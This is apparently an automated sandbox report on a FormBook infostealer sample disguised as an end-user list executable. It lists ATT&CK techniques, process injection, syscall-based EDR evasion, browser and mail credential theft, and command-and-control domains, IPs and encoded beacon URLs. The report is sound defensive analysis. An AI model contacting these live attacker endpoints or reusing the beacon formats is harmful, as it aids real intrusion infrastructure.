                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials113
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1596597 Sample: 022QCX_End_User_List_2025.exe Startdate: 22/01/2025 Architecture: WINDOWS Score: 100 31 www.physicsbrain.xyz 2->31 33 www.autonomousrich.xyz 2->33 35 6 other IPs or domains 2->35 45 Multi AV Scanner detection for submitted file 2->45 47 Yara detected FormBook 2->47 49 Yara detected AntiVM3 2->49 53 3 other signatures 2->53 10 022QCX_End_User_List_2025.exe 3 2->10         started        signatures3 51 Performs DNS queries to domains with low reputation 33->51 process4 file5 29 C:\...\022QCX_End_User_List_2025.exe.log, ASCII 10->29 dropped 65 Injects a PE file into a foreign processes 10->65 14 022QCX_End_User_List_2025.exe 10->14         started        signatures6 process7 signatures8 67 Maps a DLL or memory area into another process 14->67 17 gJe493hPOgj2OnF5.exe 14->17 injected process9 signatures10 43 Found direct / indirect Syscall (likely to bypass EDR) 17->43 20 secinit.exe 13 17->20         started        process11 signatures12 55 Tries to steal Mail credentials (via file / registry access) 20->55 57 Tries to harvest and steal browser information (history, passwords, etc) 20->57 59 Modifies the context of a thread in another process (thread injection) 20->59 61 3 other signatures 20->61 23 gJe493hPOgj2OnF5.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 www.physicsbrain.xyz 13.248.169.48, 49742, 50021, 50022 AMAZON-02US United States 23->37 39 www.corellia.pro 217.160.0.90, 50025, 50026, 50027 ONEANDONE-ASBrauerstrasse48DE Germany 23->39 41 3 other IPs or domains 23->41 63 Found direct / indirect Syscall (likely to bypass EDR) 23->63 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                022QCX_End_User_List_2025.exe34%ReversingLabsWin32.Trojan.Sonbokli
                022QCX_End_User_List_2025.exe28%VirustotalBrowse
                022QCX_End_User_List_2025.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.corellia.pro/eee1/0%Avira URL Cloudsafe
                http://www.physicsbrain.xyz/i9o2/?Gb=eeVMOLNT7Wv5dPd2abeY2s6wfV4z97Ojpf1j0+DhWbaaRP3NDl28Px2LHOiznaPSxG5Xa8rlCZjeYW1RU+5lmLpxfYJ7GpaXG0AU5Q2hJ+YZECeKnaUmPKw=&c8h40=q8sx8pUX600%Avira URL Cloudsafe
                http://www.corellia.pro0%Avira URL Cloudsafe
                http://www.topked.top/g9qz/?Gb=J9sRrZ4fqsb/1Q6DHg/horvKP/Y227PlctC80LIvBLslcKLdVtpBX2y3nBvKVl1xysCjrJ6Q3kV9G4g20t4jViulyCGdG0mz9ZyUbW3XLJR78Ll+mTUZduw=&c8h40=q8sx8pUX600%Avira URL Cloudsafe
                http://www.car-select.online/sps0/0%Avira URL Cloudsafe
                http://www.bydotoparca.net/s3u9/?Gb=UzjCSVSddvdCY8C1FJhZD3hzV3cx7V6VeHfhkJM3nHWcSpz3gZ2Mu5mgzC51fDOgl0cc0ISzjbohHF66d8TEsNQ+DIbND6ryFzsAfnoTIAADRp566kYszBo=&c8h40=q8sx8pUX600%Avira URL Cloudsafe
                http://www.autonomousrich.xyz/5l58/0%Avira URL Cloudsafe
                http://www.bydotoparca.net/s3u9/0%Avira URL Cloudsafe
                http://www.autonomousrich.xyz/5l58/?Gb=mzKLqUgWNSOc0HCmYD0eZB35mXOvxurDzKLO7iktqSi1e8VIoGhrLQ80YJoT2UJy6ZdaxC2wU3x58VDwsjwy77YqYU9tnNrtZSFWdn4ViixqxAzw7XlvsxQ=&c8h40=q8sx8pUX600%Avira URL Cloudsafe
                http://www.corellia.pro/eee1/?Gb=n9kO9VSsPKocZxgZzQNS6oD/2NdyhckYHbvIjRRvOevNyFmmshV66n7ll9r5u+VXxmlOglvHHE9+Zbjf/X+X+i+/kEtv5fcMwQaiykVTbVos+Dhavap1uoI=&c8h40=q8sx8pUX600%Avira URL Cloudsafe
                http://www.topked.top/g9qz/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.car-select.online
                		31.31.196.17
                		truefalse
                  		unknown
                  www.autonomousrich.xyz
                  		13.248.169.48
                  		truetrue
                    		unknown
                    www.corellia.pro
                    		217.160.0.90
                    		truefalse
                      		unknown
                      www.physicsbrain.xyz
                      		13.248.169.48
                      		truetrue
                        		unknown
                        www.topked.top
                        		192.64.118.221
                        		truefalse
                          		unknown
                          natroredirect.natrocdn.com
                          		85.159.66.93
                          		truefalse
                            		high
                            www.bydotoparca.net
                            		unknown
                            		unknownfalse
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://www.corellia.pro/eee1/false
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.bydotoparca.net/s3u9/false
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.car-select.online/sps0/false
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.autonomousrich.xyz/5l58/false
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.physicsbrain.xyz/i9o2/?Gb=eeVMOLNT7Wv5dPd2abeY2s6wfV4z97Ojpf1j0+DhWbaaRP3NDl28Px2LHOiznaPSxG5Xa8rlCZjeYW1RU+5lmLpxfYJ7GpaXG0AU5Q2hJ+YZECeKnaUmPKw=&c8h40=q8sx8pUX60false
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.corellia.pro/eee1/?Gb=n9kO9VSsPKocZxgZzQNS6oD/2NdyhckYHbvIjRRvOevNyFmmshV66n7ll9r5u+VXxmlOglvHHE9+Zbjf/X+X+i+/kEtv5fcMwQaiykVTbVos+Dhavap1uoI=&c8h40=q8sx8pUX60false
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.topked.top/g9qz/?Gb=J9sRrZ4fqsb/1Q6DHg/horvKP/Y227PlctC80LIvBLslcKLdVtpBX2y3nBvKVl1xysCjrJ6Q3kV9G4g20t4jViulyCGdG0mz9ZyUbW3XLJR78Ll+mTUZduw=&c8h40=q8sx8pUX60false
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.bydotoparca.net/s3u9/?Gb=UzjCSVSddvdCY8C1FJhZD3hzV3cx7V6VeHfhkJM3nHWcSpz3gZ2Mu5mgzC51fDOgl0cc0ISzjbohHF66d8TEsNQ+DIbND6ryFzsAfnoTIAADRp566kYszBo=&c8h40=q8sx8pUX60false
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.autonomousrich.xyz/5l58/?Gb=mzKLqUgWNSOc0HCmYD0eZB35mXOvxurDzKLO7iktqSi1e8VIoGhrLQ80YJoT2UJy6ZdaxC2wU3x58VDwsjwy77YqYU9tnNrtZSFWdn4ViixqxAzw7XlvsxQ=&c8h40=q8sx8pUX60false
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.topked.top/g9qz/false
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://duckduckgo.com/chrome_newtabsecinit.exe, 00000007.00000003.2261975899.0000000008178000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://www.apache.org/licenses/LICENSE-2.0022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.fontbureau.com022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.fontbureau.com/designersG022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://duckduckgo.com/ac/?q=secinit.exe, 00000007.00000003.2261975899.0000000008178000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.fontbureau.com/designers/?022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.founder.com.cn/cn/bThe022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icosecinit.exe, 00000007.00000003.2261975899.0000000008178000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.fontbureau.com/designers?022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=secinit.exe, 00000007.00000003.2261975899.0000000008178000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.tiro.com022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=secinit.exe, 00000007.00000003.2261975899.0000000008178000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.fontbureau.com/designers022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.corellia.progJe493hPOgj2OnF5.exe, 00000008.00000002.2942300801.00000000056F6000.00000040.80000000.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.goodfont.co.kr022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.ecosia.org/newtab/secinit.exe, 00000007.00000003.2261975899.0000000008178000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.carterandcone.coml022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.sajatypeworks.com022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.typography.netD022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://ac.ecosia.org/autocomplete?q=secinit.exe, 00000007.00000003.2261975899.0000000008178000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.fontbureau.com/designers/cabarga.htmlN022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.founder.com.cn/cn/cThe022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.galapagosdesign.com/staff/dennis.htm022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.founder.com.cn/cn022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.fontbureau.com/designers/frere-user.html022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsecinit.exe, 00000007.00000003.2261975899.0000000008178000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.jiyu-kobo.co.jp/022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.galapagosdesign.com/DPlease022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.fontbureau.com/designers8022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.ascendercorp.com/typedesigners.html022QCX_End_User_List_2025.exe, 00000000.00000002.1741099103.000000000626E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.fonts.com022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.sandoll.co.kr022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.urwpp.deDPlease022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.zhongyicts.com.cn022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.sakkal.com022QCX_End_User_List_2025.exe, 00000000.00000002.1741596617.0000000007452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=secinit.exe, 00000007.00000003.2261975899.0000000008178000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high

                                                                                                    World Map of Contacted IPs

                                                                                                    • No. of IPs < 25%
                                                                                                    • 25% < No. of IPs < 50%
                                                                                                    • 50% < No. of IPs < 75%
                                                                                                    • 75% < No. of IPs

                                                                                                    Public IPs

                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                    192.64.118.221
                                                                                                    		www.topked.topUnited States
                                                                                                    		22612NAMECHEAP-NETUSfalse
                                                                                                    13.248.169.48
                                                                                                    		www.autonomousrich.xyzUnited States
                                                                                                    		16509AMAZON-02UStrue
                                                                                                    217.160.0.90
                                                                                                    		www.corellia.proGermany
                                                                                                    		8560ONEANDONE-ASBrauerstrasse48DEfalse
                                                                                                    31.31.196.17
                                                                                                    		www.car-select.onlineRussian Federation
                                                                                                    		197695AS-REGRUfalse
                                                                                                    85.159.66.93
                                                                                                    		natroredirect.natrocdn.comTurkey
                                                                                                    		34619CIZGITRfalse

                                                                                                    General Information

                                                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                                                    Analysis ID:1596597
                                                                                                    Start date and time:2025-01-22 07:50:06 +01:00
                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                    Overall analysis duration:0h 9m 11s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:full
                                                                                                    Cookbook file name:default.jbs
                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                    Number of analysed new started processes analysed:9
                                                                                                    Number of new started drivers analysed:0
                                                                                                    Number of existing processes analysed:0
                                                                                                    Number of existing drivers analysed:0
                                                                                                    Number of injected processes analysed:2
                                                                                                    Technologies:
                                                                                                    • HCA enabled
                                                                                                    • EGA enabled
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode:default
                                                                                                    Analysis stop reason:Timeout
                                                                                                    Sample name:022QCX_End_User_List_2025.exe
                                                                                                    Detection:MAL
                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@7/2@6/5
                                                                                                    EGA Information:
                                                                                                    • Successful, ratio: 75%
                                                                                                    HCA Information:
                                                                                                    • Successful, ratio: 92%
                                                                                                    • Number of executed functions: 104
                                                                                                    • Number of non-executed functions: 285
                                                                                                    Cookbook Comments:
                                                                                                    • Found application associated with file extension: .exe

                                                                                                    Warnings

                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                    • Excluded IPs from analysis (whitelisted): 184.28.90.27, 4.245.163.56, 13.107.246.45
                                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.

                                                                                                    Simulations

                                                                                                    Behavior and APIs

                                                                                                    TimeTypeDescription
                                                                                                    01:50:59API Interceptor1x Sleep call for process: 022QCX_End_User_List_2025.exe modified
                                                                                                    01:52:11API Interceptor1601263x Sleep call for process: secinit.exe modified

                                                                                                    Joe Sandbox View / Context

                                                                                                    IPs

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    192.64.118.22115300429772_20250121_09114163_HesapOzeti.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.freshrizon.life/qirf/
                                                                                                    CV-Elena-Alba-Garcia.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.freshrizon.life/ds8w/
                                                                                                    New Invoice.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.nexave.live/g9oo/
                                                                                                    INVOICE, PACKING LIST, COPY BL.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.topked.top/g9qz/
                                                                                                    PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.vibrantoul.life/pp15/
                                                                                                    Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.vibrantoul.life/pp15/
                                                                                                    BlgAsBdkiD.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.oporio.xyz/wsmp/
                                                                                                    TT copy.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.elarac.top/favd/
                                                                                                    Maryam Farokhi-PhD- CV-1403.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.oriony.live/baro/
                                                                                                    RO2Y11yOJ7.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.elarac.top/favd/
                                                                                                    13.248.169.4815300429772_20250121_09114163_HesapOzeti.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.goodparents.net/s2pl/
                                                                                                    CV-Elena-Alba-Garcia.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.israeljobs.net/9hic/
                                                                                                    New Invoice.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.shibbets.xyz/r026/
                                                                                                    PO#98540-00.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.exhelp.xyz/p52w/
                                                                                                    INVOICE, PACKING LIST, COPY BL.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.autonomousrich.xyz/5l58/
                                                                                                    11001_10032.jseGet hashmaliciousFormBookBrowse
                                                                                                    • www.meacci.xyz/y3n2/
                                                                                                    PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.woca.group/72ra/
                                                                                                    Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.woca.group/72ra/
                                                                                                    Payment Details rar.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.autonomousoid.pro/mnv3/
                                                                                                    New order BPD-003777.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.satoshichecker.xyz/0hyc/

                                                                                                    Domains

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    www.physicsbrain.xyz15300429772_20250121_09114163_HesapOzeti.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 13.248.169.48
                                                                                                    INVOICE, PACKING LIST, COPY BL.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 13.248.169.48
                                                                                                    www.corellia.proINVOICE, PACKING LIST, COPY BL.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 217.160.0.90
                                                                                                    www.car-select.online15300429772_20250121_09114163_HesapOzeti.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 31.31.196.17
                                                                                                    INVOICE, PACKING LIST, COPY BL.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 31.31.196.17
                                                                                                    natroredirect.natrocdn.comPO#98540-00.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 85.159.66.93
                                                                                                    INVOICE, PACKING LIST, COPY BL.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 85.159.66.93
                                                                                                    SPV0209200.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 85.159.66.93
                                                                                                    PO-DOC1522025-14.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 85.159.66.93
                                                                                                    RFQ862_791.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                    • 85.159.66.93
                                                                                                    PO-DOC1522025-12.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 85.159.66.93
                                                                                                    Fedex 22122024 overdue invoicesxlx..exeGet hashmaliciousFormBookBrowse
                                                                                                    • 85.159.66.93
                                                                                                    PO-DOC1522025-13.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 85.159.66.93
                                                                                                    PO -2025918.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                    • 85.159.66.93
                                                                                                    PO-DOC1522025-12.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 85.159.66.93
                                                                                                    www.autonomousrich.xyzINVOICE, PACKING LIST, COPY BL.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 13.248.169.48
                                                                                                    www.topked.topINVOICE, PACKING LIST, COPY BL.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 192.64.118.221

                                                                                                    ASNs

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    ONEANDONE-ASBrauerstrasse48DEhttps://officialkarir.com/wp-content/plugins/wp-automatic/ionos/login.ionos.de/pass.html?user1=Get hashmaliciousUnknownBrowse
                                                                                                    • 213.165.66.58
                                                                                                    https://officialkarir.com/wp-content/plugins/wp-automatic/ionos/login.ionos.de/index1.htmlGet hashmaliciousUnknownBrowse
                                                                                                    • 213.165.66.58
                                                                                                    https://www.millardwire.comGet hashmaliciousUnknownBrowse
                                                                                                    • 74.208.236.183
                                                                                                    doc01210250121.jsGet hashmaliciousFormBookBrowse
                                                                                                    • 217.160.0.207
                                                                                                    ADtours0121025.Vbs.vbsGet hashmaliciousFormBookBrowse
                                                                                                    • 217.160.0.207
                                                                                                    AW Bestellung 20250117 zu Projekt 90383(1).htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 217.160.202.36
                                                                                                    INVOICE, PACKING LIST, COPY BL.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 217.160.0.90
                                                                                                    AW Bestellung 20250117 zu Projekt 90383.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 217.160.202.36
                                                                                                    RFQ 969 MV WINDRAY REEFER-YSw6yAXc9RZAymA-PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 217.160.0.167
                                                                                                    http://questionnaire.tradeGet hashmaliciousUnknownBrowse
                                                                                                    • 217.160.0.119
                                                                                                    AMAZON-02USarmv6l.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 52.25.108.220
                                                                                                    https://duskrise.shop/Get hashmaliciousUnknownBrowse
                                                                                                    • 34.246.210.227
                                                                                                    test.htaGet hashmaliciousVidarBrowse
                                                                                                    • 18.244.18.32
                                                                                                    x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                    • 34.214.152.71
                                                                                                    87.121.79.19-mips-2025-01-22T04_20_52.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                    • 65.11.138.2
                                                                                                    Anal Glory 5 Brazzers 2024 XXX WEBDL 540p SP...msiGet hashmaliciousUnknownBrowse
                                                                                                    • 143.204.215.70
                                                                                                    arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                    • 108.138.26.52
                                                                                                    arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                    • 108.138.26.52
                                                                                                    x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                    • 108.138.26.52
                                                                                                    boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                    • 54.171.230.55
                                                                                                    NAMECHEAP-NETUShttps://div-classstart-0-dropdown.odoo.com/documents/content/heIbobZBSqWGKM9nbnbWkQobGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 68.65.123.236
                                                                                                    Annual Leave sheet 2025.vbsGet hashmaliciousMassLogger RATBrowse
                                                                                                    • 198.54.122.135
                                                                                                    ADtours0121025.Vbs.vbsGet hashmaliciousFormBookBrowse
                                                                                                    • 68.65.122.71
                                                                                                    15300429772_20250121_09114163_HesapOzeti.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 192.64.118.221
                                                                                                    CV-Elena-Alba-Garcia.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 192.64.118.221
                                                                                                    New Invoice.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 192.64.118.221
                                                                                                    PO#98540-00.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 63.250.47.57
                                                                                                    INVOICE, PACKING LIST, COPY BL.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 192.64.118.221
                                                                                                    11001_10032.jseGet hashmaliciousFormBookBrowse
                                                                                                    • 63.250.47.57
                                                                                                    PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
                                                                                                    • 192.64.118.221

                                                                                                    JA3 Fingerprints

                                                                                                    No context

                                                                                                    Dropped Files

                                                                                                    No context

                                                                                                    Created / dropped Files

                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\022QCX_End_User_List_2025.exe.log

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\022QCX_End_User_List_2025.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1216
                                                                                                    Entropy (8bit):5.34331486778365
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                    Malicious:true
                                                                                                    Reputation:high, very likely benign file
                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                    C:\Users\user\AppData\Local\Temp\472E1186

                                                                                                    Download File
